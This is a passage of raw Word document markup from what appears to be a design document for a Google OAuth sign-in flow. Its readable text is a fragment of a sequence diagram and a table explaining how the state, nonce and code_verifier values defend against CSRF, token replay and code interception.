                <v:rect id="Rectangle 2469" o:spid="_x0000_s1353" style="position:absolute;left:1007;top:47936;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3E48D33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70" o:spid="_x0000_s1354" style="position:absolute;left:3186;top:47936;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50536469" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">│                            │ 9. resolve staff </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>account   │</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2471" o:spid="_x0000_s1355" style="position:absolute;left:1007;top:49651;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7025C40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72" o:spid="_x0000_s1356" style="position:absolute;left:3186;top:49651;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4845DE30" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">│                            │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no auto-</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>provisioning)  │</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2473" o:spid="_x0000_s1357" style="position:absolute;left:1007;top:51461;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LxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvhf6H5RV6q5tas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GOalovHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="5F92102C"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74" o:spid="_x0000_s1358" style="position:absolute;left:3186;top:51461;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7/xgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvC36H8ARva6qI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7HMO/8YAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="25A8F47F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">│ 10. {user, </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">token}   </w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">       │                            │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2475" o:spid="_x0000_s1359" style="position:absolute;left:1007;top:53175;width:289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074F8F28"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476" o:spid="_x0000_s1360" style="position:absolute;left:3186;top:53175;width:4273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648A15A9" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>│◄───────────────────────────┤                            │</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC4B7A2" w14:textId="77777777" w:rsidR="0011533D" w:rsidRDefault="0011533D">
      <w:pPr>
        <w:spacing w:after="166" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="43"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73C47D87" w14:textId="77777777" w:rsidR="0011533D" w:rsidRDefault="0011533D">
      <w:pPr>
        <w:spacing w:after="166" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="43"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E544CCF" w14:textId="77777777" w:rsidR="0011533D" w:rsidRDefault="0011533D">
      <w:pPr>
        <w:spacing w:after="166" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="43"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37ACE222" w14:textId="77777777" w:rsidR="0011533D" w:rsidRDefault="0011533D">
      <w:pPr>
        <w:spacing w:after="166" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="43"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F95CB56" w14:textId="231354E7" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">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The three one-time values, and why each is needed:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10194" w:type="dxa"/>
        <w:tblInd w:w="38" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="99" w:type="dxa"/>
          <w:left w:w="110" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1063"/>
        <w:gridCol w:w="1470"/>
        <w:gridCol w:w="7661"/>
      </w:tblGrid>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="6D1026B8" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="671"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="106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cPr>
          <w:p w14:paraId="10A6847A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="3"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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F34F4D1" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="24"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Defends against</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="76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cPr>
          <w:p w14:paraId="0DA0CE1F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="12"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How</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="4484E768" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="904"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="106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fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1FAA482C" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="46"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2864" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="77217BF9" wp14:editId="5A9DE522">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>70247</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-23650</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="342900" cy="142875"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="31008" name="Group 31008"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="342900" cy="142875"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="342900" cy="142875"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="2607" name="Shape 2607"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="342900" cy="142875"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="342900" h="142875">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="333375" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="336005" y="0"/>
                                        <a:pt x="338250" y="930"/>
                                        <a:pt x="340110" y="2778"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="341970" y="4638"/>
                                        <a:pt x="342900" y="6896"/>
                                        <a:pt x="342900" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="342900" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="342900" y="135979"/>
                                        <a:pt x="341970" y="138224"/>
                                        <a:pt x="340110" y="140084"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="338250" y="141945"/>
                                        <a:pt x="336005" y="142875"/>
                                        <a:pt x="333375" y="142875"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="142875"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="142875"/>
                                        <a:pt x="4650" y="141945"/>
                                        <a:pt x="2790" y="140084"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="930" y="138224"/>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008" style="width:27pt;height:11.25pt;position:absolute;z-index:-2147483525;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:5.53125pt;mso-position-vertical-relative:text;margin-top:-1.8623pt;" coordsize="3429,1428">
                      <v:shape id="Shape 2607" style="position:absolute;width:3429;height:1428;left:0;top:0;" coordsize="342900,142875" path="m9525,0l333375,0c336005,0,338250,930,340110,2778c341970,4638,342900,6896,342900,9525l342900,133350c342900,135979,341970,138224,340110,140084c338250,141945,336005,142875,333375,142875l9525,142875c6895,142875,4650,141945,2790,140084c930,138224,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state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="629F860A"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CSRF / session fixation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="76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1CE62778" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="12"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Ties the callback to a flow </w:t>
            </w:r>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>this server</w:t>
            </w:r>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> started, so an attacker cannot hand a victim a crafted callback URL and log them into the </w:t>
            </w:r>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>attacker's</w:t>
            </w:r>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> account — where everything the victim then does is visible to them</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="1B9D553A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="675"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="106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cPr>
          <w:p w14:paraId="39AE5F31" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="46"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3888" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="766C35EB" wp14:editId="305D8024">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>70247</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-23650</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="342900" cy="133350"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="31164" name="Group 31164"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="342900" cy="133350"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="342900" cy="133350"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="2618" name="Shape 2618"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="342900" cy="133350"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="342900" h="133350">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="333375" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="336005" y="0"/>
                                        <a:pt x="338250" y="930"/>
                                        <a:pt x="340110" y="2778"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="341970" y="4638"/>
                                        <a:pt x="342900" y="6896"/>
                                        <a:pt x="342900" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="342900" y="123825"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="342900" y="126454"/>
                                        <a:pt x="341970" y="128687"/>
                                        <a:pt x="340110" y="130547"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="338250" y="132407"/>
                                        <a:pt x="336005" y="133338"/>
                                        <a:pt x="333375"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164" style="width:27pt;height:10.5pt;position:absolute;z-index:-2147483514;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:5.53125pt;mso-position-vertical-relative:text;margin-top:-1.8623pt;" coordsize="3429,1333">
                      <v:shape id="Shape 2618" style="position:absolute;width:3429;height:1333;left:0;top:0;" coordsize="342900,133350" path="m9525,0l333375,0c336005,0,338250,930,340110,2778c341970,4638,342900,6896,342900,9525l342900,123825c342900,126454,341970,128687,340110,130547c338250,132407,336005,133338,333375,133350l9525,133350c6895,133338,4650,132407,2790,130547c930,128687,0,126454,0,123825l0,9525c0,6896,930,4638,2790,2778c4650,930,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nonce</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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cPr>
          <w:p w14:paraId="7186AF8B"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Token replay</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="76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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5709520B" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="12"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Embedded in the ID token by Google and checked on return, so a token captured from one sign-in cannot be submitted again</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="005C54CB" w14:paraId="60A49BCA" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="688"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="106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7DDB54C1" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="3" w:firstLine="42"/>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4912" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E09C404" wp14:editId="27B18640">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>70247</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-23650</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="495300" cy="285750"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="31234" name="Group 31234"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="495300" cy="285750"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="495300" cy="285750"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="2623" name="Shape 2623"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="495300" cy="133350"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="495300" h="133350">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="495300" y="0"/>
                                      </a:lnTo>
                                      <a:lnTo>
                                        <a:pt x="495300" y="133350"/>
                                      </a:lnTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="133350"/>
                                        <a:pt x="4650" y="132420"/>
                                        <a:pt x="2790" y="130559"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="0" y="123825"/>
                                      </a:lnTo>
                                      <a:lnTo>
                                        <a:pt x="0" y="9525"/>
                                      </a:lnTo>
                                      <a:lnTo>
                                        <a:pt x="2790" y="2778"/>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625" name="Shape 2625"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="152400"/>
                                  <a:ext cx="323850" cy="133350"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="323850" h="133350">
                                      <a:moveTo>
                                        <a:pt x="0" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="314325" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="316955" y="0"/>
                                        <a:pt x="319200" y="930"/>
                                        <a:pt x="321060" y="2778"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="322920" y="4638"/>
                                        <a:pt x="323850" y="6896"/>
                                        <a:pt x="323850" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="323850" y="123825"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="323850" y="126454"/>
                                        <a:pt x="322920" y="128687"/>
                                        <a:pt x="321060" y="130547"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="319200" y="132407"/>
                                        <a:pt x="316955" y="133338"/>
                                        <a:pt x="314325" y="133350"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="0" y="133350"/>
                                      </a:lnTo>
                                      <a:lnTo>
                                        <a:pt x="0" y="0"/>
                                      </a:ln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34" style="width:39pt;height:22.5pt;position:absolute;z-index:-2147483508;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:5.53125pt;mso-position-vertical-relative:text;margin-top:-1.8623pt;" coordsize="4953,2857">
                      <v:shape id="Shape 2623" style="position:absolute;width:4953;height:1333;left:0;top:0;" coordsize="495300,133350" path="m9525,0l495300,0l495300,133350l9525,133350c6895,133350,4650,132420,2790,130559l0,123825l0,9525l2790,2778c4650,930,6895,0,9525,0x">
                        <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                        <v:fill on="true" color="#edf2f6"/>
                      </v:shape>
                      <v:shape id="Shape 2625" style="position:absolute;width:3238;height:1333;left:0;top:1524;" coordsize="323850,133350" path="m0,0l314325,0c316955,0,319200,930,321060,2778c322920,4638,323850,6896,323850,9525l323850,123825c323850,126454,322920,128687,321060,130547c319200,132407,316955,133338,314325,133350l0,133350l0,0x">
                        <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                        <v:fill on="true" color="#edf2f6"/>
                      </v:shape>
                    </v:group>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>code_ver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005C54CB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas"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ifier</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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vAlign w:val="center"/>
            <w:shd w:val="clear" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="624F6347" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="36"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Code</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AA07BAE"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interception</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="766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fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="19B5705F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="12"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Proves the party redeeming the code is the party that requested it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25F985D3" w14:textId="0C6BF10C" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="321"/>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5936" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="607812F3" wp14:editId="797BDBFA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1284982</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>153082</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="342900" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="31283" name="Group 31283"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="342900" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="342900" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2636" name="Shape 2636"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="342900" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="342900" h="142875">
